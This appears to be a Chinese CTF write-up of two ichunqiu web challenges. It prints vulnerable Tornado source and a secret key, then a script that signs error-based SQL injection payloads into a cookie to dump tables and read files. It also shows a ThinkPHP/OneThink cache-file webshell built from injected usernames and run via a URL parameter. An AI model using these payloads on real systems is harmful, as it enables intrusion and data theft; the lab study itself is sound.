由于校赛马上就要开始了，自己最近也停止了钻研虚拟机跟渗透的过程，准备把ichunqiu上的web题再继续刷下去。于是遇到两道让我 收获颇丰的题目。

xss平台

这道题目算是很有意思的一道sql注入题。确切讲属于cookie加密注入。只不过要想发现漏洞并没有那么简单。

这里简单说一遍思路，首先当然是尝试登录了。只不过用户名与密码都一无所知。那么是不是有其他隐藏信息呢？扫描一遍目录没什么收获。暴力扫目录太耗时间。所以这里有一招利用报错获取信息的技巧。通过抓包将传参改为数组得到报错信息：

数组报错

发现这里的login.py部署在/rtiny/下，感觉有蹊跷。于是谷歌rtiny。
在github上找到这个项目并说明是一个xss轮子。仔细看下源码不难发现我们所做的xss平台这个网站是基于python的tornado框架。进行源码审计（这里我偷懒了，看大佬们轻松发现sql注入漏洞。毕竟文件太多看不来hh）
贴下rtiny目录下其中lock.py的源码

#!/usr/bin/env python
# -*- coding:utf-8 -*-  

__author__ = 'r0ker'
import tornado.web
from function import md5
import db
from config import URL


class LockHandler(tornado.web.RequestHandler):
    def get(self):
        self.set_secure_cookie("lock",'1')
        self.render("lock.html")

    def post(self):
        username = self.get_secure_cookie("username") or ''
        passwd = md5(self.get_argument('password', ''))
        row = db.ct("manager", "*", "username='" + username + "' and password='" + passwd + "'")
        if row:
            self.set_secure_cookie("lock", "0")
            self.redirect("http://" + URL)
        else:
            self.redirect("http://" + URL + "/lock")

这里不难发现username参数会用get_secure_cookie()函数从cookie中获取username，之后会利用username参数与passwd参数去进行数据库操作。这里我去db.py确认了下ct操作的功能

def ct(table, column, where):
    return db.get("select "+column+" from "+table+" where "+where)

看来是可以注入了。但现在需要知道cookie的加密方法，这个加密密钥可以在index.py中找到。为："cookie_secret": "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc="
接下来要做的，就是利用这个现有轮子复现web服务，让我们的注入语句能够经过加密。
脚本如下。

# coding:utf-8
import tornado.ioloop
import tornado.web


settings = {
   "cookie_secret" : "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=",
}

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write("Hello")
        #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- ")
        #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select group_concat(distinct table_name) from information_schema.tables where table_schema=database())))-- ")
        #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='manager')))-- ")
        #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),29,60))) -- ")
        #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select load_file('/var/www/html/f13g_ls_here.txt'))))#")
        self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),24,60)))#")
        self.write(self.get_secure_cookie("username"))

def make_app():
    return tornado.web.Application([
        (r"/index", MainHandler),
        ], **settings)

if __name__ == "__main__":
    app = make_app()
    app.listen(8089)
    tornado.ioloop.IOLoop.instance().start()

这样我们就可以在本地复现并加密了。这里sql注入选择报错注入或者普通的select都是可以的。（报错注入比较稳）本地打开localhost:8089/index后抓包把返回的cookie中username值copy下来。之后进入到/lock下提交（在cookie中加入username的值）

lock

之后可由抓包信息拿到库名表名列名等。
不过这里爆出来的信息不能完全显示（username+passwd+email长度过长了），所以注入语句中可以看到使用了mid()函数，需要调整参数分开读数据，最终利用load_file()读取flag也是如此。

OneThink

苦苦坚持才做出的一题。昨天最后拿到flag后就发誓一定要写wp记录下自己的做题经历（菜鸡狂喜）。这里来写下详细过程：
首先登陆进去发现是OneThink框架。百度下搜到了OneThink存在的漏洞。还发现这个框架也是拿Thinkphp二次开发的，存在一个著名漏洞,就是缓存文件存储名是一个固定的。2bb202459c30a1628513f40ab22fa01a.php
去请求/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php也发现确实存在。
关于漏洞的简单利用之传一个phpinfo();上去
https://bbs.ichunqiu.com/thread-4918-1-1.html
可以看见我们也可以利用这个缓存文件漏洞getshell.但是首先注意，我们为了拿shell,必须确保语句正确传入缓存，也就是说我们必须以正确的用户名登录。那用户名有哪里不好传吗？当然，如果看完看上面那篇漏洞利用，就会发现我们的用户名必须是%0a+语句+//的格式，也就是说先换行，执行语句并注释掉后面的一个大括号。这里我们如果直接在注册界面用用户名注册，上传时仍会将我们的%0a进行url编码，这样实际上执行语句就不正确了。
于是开始下手。看到其他大佬都是burpsuite intercept进行改包，我也开始准备bp拦包发包。。。结果失败了？？？我百思不得其解，我的bp明明可以拦到http的post请求，结果却不能在intercept下抓到这个网页的post包？（测试了下其他网站都行，真的让人绝望）试图用repeater功能改包却发现因为验证码的存在是没用的。
就在这时我想起了自己刚入门时使用的抓包神器Fiddler。当初在用它时学到过其breakpoint的功能：

Automatic Breakpoint
它可以在requests前或者response后进行暂停，也就是抓包了。只要有它一样可以上传。于是改用Fiddler抓包
第一步，传%0a$a=$GET_[a];//
改包
这里将被编码过的%0a直接删掉，改为Enter一个回车解决问题。然后正常发包，关掉breakpoint,确认注册成功。之后登陆这个账号，这里当然也要再度打开breakpoint,在登录时将%0a改为换行。确认正确登录即可。

第二步，传%0aecho `$a`;//
同样操作再来一遍。

改包
登录
确认登录成功后就可以利用shell了。在缓存文件利用参数a跟ls找到flag目录，之后cat即可
http://fa88cc1f11014c3485ba87c6ad3176483ba0157572714652.changame.ichunqiu.com/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php
flag

总结下吧，这两天这两道题其实都花了不少时间，但是做的格外快乐，也非常有收获。比如第一题让我了解到程序员所谓的轮子指的是什么，了解到python的tornado框架（原来就知道Django），而且即使自己不完全理解框架的知识也能加以利用。第二题把一句话木马变体成两句话getshell，而且魔鬼般的发包改包也让我体会到web手的辛酸。ichunqiu下发的容器第一个1小时用完了才开始改用fiddler,之后按套路传应该传成功了却没有拿到shell。报复性传了个phpinfo（）才确认自己在改包这个环节没有出错。于是绝望中重新下发容器再传一遍就成功了？!所以坚持一定有成果，相信自己做下去，一定不会让你失望。